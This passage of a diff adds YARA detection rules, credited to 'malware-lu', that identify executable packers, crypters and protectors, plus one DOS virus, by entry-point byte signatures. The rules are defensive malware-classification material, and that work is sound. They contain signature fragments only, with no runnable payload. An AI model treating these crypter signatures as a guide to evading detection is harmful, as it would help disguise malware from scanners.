+		$a0 = { 50 B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 02 00 72 ?? B4 09 BA ?? ?? CD 21 B8 01 4C CD 21 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 59 2D ?? ?? 8E D0 51 2D ?? ?? 8E C0 50 B9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITEv200c
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 B8 ?? ?? BA ?? ?? 3B C4 73 ?? 8B C4 2D ?? ?? 25 ?? ?? 8B F8 B9 ?? ?? BE ?? ?? FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeNeolite20emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 A6 00 00 00 B0 7B 40 00 78 60 40 00 7C 60 40 00 00 00 00 00 B0 3F 00 00 12 62 40 00 4E 65 6F 4C 69 74 65 20 45 78 65 63 75 74 61 62 6C 65 20 46 69 6C 65 20 43 6F 6D 70 72 65 73 73 6F 72 0D 0A 43 6F 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 2C 31 39 39 39 20 4E 65 6F 57 6F 72 78 20 49 6E 63 0D 0A 50 6F 72 74 69 6F 6E 73 20 43 6F 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 37 2D 31 39 39 39 20 4C 65 65 20 48 61 73 69 75 6B 0D 0A 41 6C 6C 20 52 69 67 68 74 73 20 52 65 73 65 72 76 65 64 2E 00 00 00 00 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv300v301Relocationspack
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? BA ?? ?? BF ?? ?? B9 ?? ?? 8C CD 8E DD 81 ED ?? ?? 06 06 8B DD 2B DA 8B D3 FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02CodeSafe20Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 0B 83 EC 10 53 56 57 E8 C4 01 00 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02ZCode101Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E9 FB FF FF FF C3 68 00 00 00 00 64 FF 35 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxCaz1204
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E 83 EE 03 1E 06 B8 FF FF CD 2F 3C 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ZealPack10Zeal
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C7 45 F4 00 00 40 00 C7 45 F0 ?? ?? ?? ?? 8B 45 F4 05 ?? ?? ?? ?? 89 45 F4 C7 45 FC 00 00 00 00 EB 09 8B 4D FC 83 C1 01 89 4D FC 8B 55 FC 3B 55 F0 7D 22 8B 45 F4 03 45 FC 8A 08 88 4D F8 0F BE 55 F8 83 F2 0F 88 55 F8 8B 45 F4 03 45 FC 8A 4D F8 88 08 EB CD FF 65 F4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CPAV
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 4D 5A B1 01 93 01 00 00 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackFullEdition117iBoxLZMAAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D B5 67 30 00 00 8D 9D 66 03 00 00 33 FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule INCrypter03INinYbyz3e_NiFe
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 64 A1 30 00 00 00 8B 40 0C 8B 40 0C 8D 58 20 C7 03 00 00 00 00 E8 00 00 00 00 5D 81 ED 4D 16 40 00 8B 9D 0E 17 40 00 64 A1 18 00 00 00 8B 40 30 0F B6 40 02 83 F8 01 75 05 03 DB C1 CB 10 8B 8D 12 17 40 00 8B B5 06 17 40 00 51 81 3E 2E 72 73 72 74 65 8B 85 16 17 40 00 E8 23 00 00 00 8B 85 1A 17 40 00 E8 18 00 00 00 8B 85 1E 17 40 00 E8 0D 00 00 00 8B 85 22 17 40 00 E8 02 00 00 00 EB 18 8B D6 3B 46 0C 72 0A 83 F9 01 74 0B 3B 46 34 72 06 BA 00 00 00 00 C3 58 83 FA 00 75 1A 8B 4E 10 8B 7E 0C 03 BD 02 17 40 00 83 F9 00 74 09 F6 17 31 0F 31 1F 47 E2 F7 59 83 C6 28 49 83 F9 00 75 88 8B 85 0A 17 40 00 89 44 24 1C 61 50 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule MorphineV27Holy_FatherRatter29A
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 65 52 6E 45 6C 33 32 2E 64 4C 6C 00 00 47 65 74 50 72 6F 63 41 64 64 72 }
+
+condition:
+		$a0
+}
+	
+	
+rule nBinderv361
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6E 35 36 34 35 36 35 33 32 33 34 35 34 33 5F 6E 62 33 5C 00 5C 6E 35 36 34 35 36 35 33 32 33 34 35 34 33 5F 6E 62 33 5C }
+
+condition:
+		$a0
+}
+	
+	
+rule MatrixDongleTDiGmbH
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 E8 B6 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? E8 00 00 00 00 5B 2B D9 8B F8 8B 4C 24 2C 33 C0 2B CF F2 AA 8B 3C 24 8B 0A 2B CF 89 5C 24 20 80 37 A2 47 49 75 F9 8D 64 24 04 FF 64 24 FC 60 C7 42 08 ?? ?? ?? ?? E8 C5 FF FF FF C3 C2 F7 29 4E 29 5A 29 E6 86 8A 89 63 5C A2 65 E2 A3 A2 }
+	$a1 = { E8 00 00 00 00 E8 00 00 00 00 59 5A 2B CA 2B D1 E8 1A FF FF FF }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule NullsoftInstallSystemv20RC2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 10 53 55 56 57 C7 44 24 14 70 92 40 00 33 ED C6 44 24 13 20 FF 15 2C 70 40 00 55 FF 15 84 72 40 00 BE 00 54 43 00 BF 00 04 00 00 56 57 A3 A8 EC 42 00 FF 15 C4 70 40 00 E8 8D FF FF FF 8B 1D 90 70 40 00 85 C0 75 21 68 FB 03 00 00 56 FF 15 5C 71 40 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule UnoPiX075BaGiE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 07 00 00 00 61 68 ?? ?? 40 00 C3 83 04 24 18 C3 20 83 B8 ED 20 37 EF C6 B9 79 37 9E 61 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv305c4UnextractablePasswordchecking
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 05 80 1B B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtBorlandDelphi20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 56 E8 02 00 00 00 B2 D9 59 68 80 ?? 41 00 E8 02 00 00 00 65 32 59 5E EB 02 CD 20 BB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Reg2Exe225byJanVorel
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 68 00 00 00 68 00 00 00 00 68 70 7D 40 00 E8 AE 20 00 00 83 C4 0C 68 00 00 00 00 E8 AF 52 00 00 A3 74 7D 40 00 68 00 00 00 00 68 00 10 00 00 68 00 00 00 00 E8 9C 52 00 00 A3 70 7D 40 00 E8 24 50 00 00 E8 E2 48 00 00 E8 44 34 00 00 E8 54 28 00 00 E8 98 27 00 00 E8 93 20 00 00 68 01 00 00 00 68 D0 7D 40 00 68 00 00 00 00 8B 15 D0 7D 40 00 E8 89 8F 00 00 B8 00 00 10 00 68 01 00 00 00 E8 9A 8F 00 00 FF 35 A4 7F 40 00 68 00 01 00 00 E8 3A 23 00 00 8D 0D A8 7D 40 00 5A E8 5E 1F 00 00 FF 35 A8 7D 40 00 68 00 01 00 00 E8 2A 52 00 00 A3 B4 7D 40 00 FF 35 A4 7F 40 00 FF 35 B4 7D 40 00 FF 35 A8 7D 40 00 E8 5C 0C 00 00 8D 0D A0 7D 40 00 5A E8 26 1F 00 00 FF 35 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov420SiliconRealmsToolworks
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 F8 8E 4C 00 68 F0 EA 49 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 88 31 4C 00 33 D2 8A D4 89 15 84 A5 4C 00 8B C8 81 E1 FF 00 00 00 89 0D 80 A5 4C 00 C1 E1 08 03 CA 89 0D 7C A5 4C 00 C1 E8 10 A3 78 A5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DalKrypt10byDalKiT
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 00 10 40 00 58 68 ?? ?? ?? 00 5F 33 DB EB 0D 8A 14 03 80 EA 07 80 F2 04 88 14 03 43 81 FB ?? ?? ?? 00 72 EB FF E7 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv15Vaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 2C 24 4F 68 ?? ?? ?? ?? FF 54 24 04 83 44 24 04 4F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor239compressedresources
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 51 68 ?? ?? ?? ?? 59 81 F1 12 3C CB 98 E9 53 2C 00 00 F7 D7 E9 EB 60 00 00 83 45 F8 02 E9 E3 36 00 00 F6 45 F8 20 0F 84 1E 21 00 00 55 E9 80 62 00 00 87 0C 24 8B E9 ?? ?? ?? ?? 00 00 23 C1 81 E9 ?? ?? ?? ?? 57 E9 ED 00 00 00 0F 88 ?? ?? ?? ?? E9 2C 0D 00 00 81 ED BB 43 CB 79 C1 E0 1C E9 9E 14 00 00 0B 15 ?? ?? ?? ?? 81 E2 2A 70 7F 49 81 C2 9D 83 12 3B E8 0C 50 00 00 E9 A0 16 00 00 59 5B C3 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 E8 41 42 00 00 E9 93 33 00 00 31 DB 89 D8 59 5B C3 A1 ?? ?? ?? ?? 8A 00 2C 99 E9 82 30 00 00 0F 8A ?? ?? ?? ?? B8 01 00 00 00 31 D2 0F A2 25 FF 0F 00 00 E9 72 21 00 00 0F 86 57 0B 00 00 E9 ?? ?? ?? ?? C1 C0 03 E8 F0 36 00 00 E9 41 0A 00 00 81 F7 B3 6E 85 EA 81 C7 ?? ?? ?? ?? 87 3C 24 E9 74 52 00 00 0F 8E ?? ?? ?? ?? E8 5E 37 00 00 68 B1 74 96 13 5A E9 A1 04 00 00 81 D1 49 C0 12 27 E9 50 4E 00 00 C1 C8 1B 1B C3 81 E1 96 36 E5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule GameGuardv20065xxexesignbyhot_UNP
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 31 FF 74 06 61 E9 4A 4D 50 30 5A BA 7D 00 00 00 80 7C 24 08 01 E9 00 00 00 00 60 BE 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EnigmaProtectorv112LITE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 83 ED 06 81 ED ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 EB 02 FF 35 60 E8 24 00 00 00 00 00 FF EB 02 CD 20 8B 44 24 0C 83 80 B8 00 00 00 03 31 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv01emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 }
+	$a1 = { 60 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 83 C4 04 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 3D FF 0F 00 00 EB 01 68 EB 02 CD 20 EB 01 E8 76 1B EB 01 68 EB 02 CD 20 EB 01 E8 CC 66 B8 FE 00 74 04 75 02 EB 02 EB 01 81 66 E7 64 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule Apex_cbeta500mhz
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? B9 FF FF FF 00 01 D0 F7 E2 72 01 48 E2 F7 B9 FF 00 00 00 8B 34 24 80 36 FD 46 E2 FA C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VProtector11A12vcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 00 76 63 61 73 6D 5F 70 72 6F 74 65 63 74 5F 32 30 30 35 5F 33 5F 31 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 F6 E8 10 00 00 00 8B 64 24 08 64 8F 05 00 00 00 00 58 EB 13 C7 83 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 AD CD 20 EB 01 0F 31 F0 EB 0C 33 C8 EB 03 EB 09 0F 59 74 05 75 F8 51 EB F1 B9 04 00 00 00 E8 1F 00 00 00 EB FA E8 16 00 00 00 E9 EB F8 00 00 58 EB 09 0F 25 E8 F2 FF FF FF 0F B9 49 75 F1 EB 05 EB F9 EB F0 D6 E8 07 00 00 00 C7 83 83 C0 13 EB 0B 58 EB 02 CD 20 83 C0 02 EB 01 E9 50 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule codeCrypter031
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 58 53 5B 90 BB ?? ?? 40 00 FF E3 90 CC CC CC 55 8B EC 5D C3 CC CC CC CC CC CC CC CC CC CC CC }
+
+condition:
+		$a0
+}
+	
+	
+rule PKTINYv10withTINYPROGv38
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2E C6 06 ?? ?? ?? 2E C6 06 ?? ?? ?? 2E C6 06 ?? ?? ?? E9 ?? ?? E8 ?? ?? 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakePESHiELD2xFEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 00 00 00 00 41 4E 41 4B 49 4E 5D 83 ED 06 EB 02 EA 04 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackFullEditionV11Xap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 10 }
+
+condition:
+		$a0
+}
+	
+	
+rule Excalibur103forgot
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 00 00 00 00 60 E8 14 00 00 00 5D 81 ED 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPack118DllaPlib043ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 7C 24 08 01 0F 85 5C 01 00 00 60 E8 00 00 00 00 8B 2C 24 83 C4 ?? 8D B5 1A 04 00 00 8D 9D C1 02 00 00 33 FF E8 61 01 00 00 EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 ?? 83 C7 ?? 83 3C 37 00 75 EB 83 BD 06 04 00 00 00 74 0E 83 BD 0A 04 00 00 00 74 05 E8 D7 01 00 00 8D 74 37 04 53 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 95 A7 03 00 00 89 85 16 04 00 00 5B FF B5 16 04 00 00 56 FF D3 83 C4 ?? 8B B5 16 04 00 00 8B C6 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01MicrosoftVisualC50MFCAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Pohernah101byKas
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED F1 26 40 00 8B BD 18 28 40 00 8B 8D 20 28 40 00 B8 38 28 40 00 01 E8 80 30 05 83 F9 00 74 71 81 7F 1C AB 00 00 00 75 62 8B 57 0C 03 95 1C 28 40 00 31 C0 51 31 C9 66 B9 FA 00 66 83 F9 00 74 49 8B 57 0C 03 95 1C 28 40 00 8B 85 24 28 40 00 83 F8 02 75 06 81 C2 00 02 00 00 51 8B 4F 10 83 F8 02 75 06 81 E9 00 02 00 00 57 BF C8 00 00 00 89 CE E8 27 00 00 00 89 C1 5F B8 38 28 40 00 01 E8 E8 24 00 00 00 59 49 EB B1 59 83 C7 28 49 EB 8A 8B 85 14 28 40 00 89 44 24 1C 61 FF E0 56 57 4F F7 D7 21 FE 89 F0 5F 5E C3 60 83 F0 05 40 90 48 83 F0 05 89 C6 89 D7 60 E8 0B 00 00 00 61 83 C7 08 83 E9 07 E2 F1 61 C3 57 8B 1F 8B 4F 04 68 B9 79 37 9E 5A 42 89 D0 48 C1 E0 05 BF 20 00 00 00 4A 89 DD C1 E5 04 29 E9 8B 6E 08 31 DD 29 E9 89 DD C1 ED 05 31 C5 29 E9 2B 4E 0C 89 CD C1 E5 04 29 EB 8B 2E 31 CD 29 EB 89 CD C1 ED 05 31 C5 29 EB 2B 5E 04 29 D0 4F 75 C8 5F 89 1F 89 4F 04 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov25xv26x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 58 ?? ?? ?? 33 D2 8A D4 89 15 EC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PESpinv11Cyberbob
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Escargot01byueMeat
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 08 28 65 73 63 30 2E 31 29 60 68 2B ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 B8 5C ?? ?? ?? 8B 00 FF D0 50 BE 00 10 ?? ?? B9 00 ?? ?? 00 EB 05 49 80 34 31 40 0B C9 75 F7 58 0B C0 74 08 33 C0 C7 00 DE C0 AD 0B BE ?? ?? ?? ?? E9 AC 00 00 00 8B 46 0C BB 00 00 ?? ?? 03 C3 50 50 B8 54 ?? ?? ?? 8B 00 FF D0 5F 80 3F 00 74 06 C6 07 00 47 EB F5 33 FF 8B 16 0B D2 75 03 8B 56 10 03 D3 03 D7 8B 0A C7 02 00 00 00 00 0B C9 74 4B F7 C1 00 00 00 80 74 14 81 E1 FF FF 00 00 50 51 50 B8 50 }
+
+condition:
+		$a0
+}
+	
+	
+rule EncryptPE2200461622006630WFS
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 7A 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv060
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 00 00 00 00 60 E8 00 00 00 00 58 83 C0 08 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01BorlandDelphi30Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 90 90 90 90 68 ?? ?? ?? ?? 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ActiveMARKTMR5311140Trymedia
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 79 11 7F AB 9A 4A 83 B5 C9 6B 1A 48 F9 27 B4 25 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEBundlev244
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB ?? ?? 40 ?? 87 DD 83 BD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv120v1201
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 9A 70 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv104bAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 12 9D ?? 89 85 1E 9D ?? ?? 80 BD 08 9D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MESSv120
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FA B9 ?? ?? F3 ?? ?? E3 ?? EB ?? EB ?? B6 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv13v14Vaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 8B 44 24 04 83 E8 4F 68 ?? ?? ?? ?? FF D0 58 59 50 }
+	$a1 = { 55 8B EC 8B 44 24 04 83 E8 4F 68 ?? ?? ?? ?? FF D0 58 59 50 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule ThinstallV27XJitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 58 BB ?? ?? ?? ?? 2B C3 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressor120BetaPEPacker
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 EB ?? 45 78 50 72 2D 76 2E 31 2E 32 2E 2E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Packanoid10ackanoid
+{
+      meta:
+		author="malware-lu"
+strings:
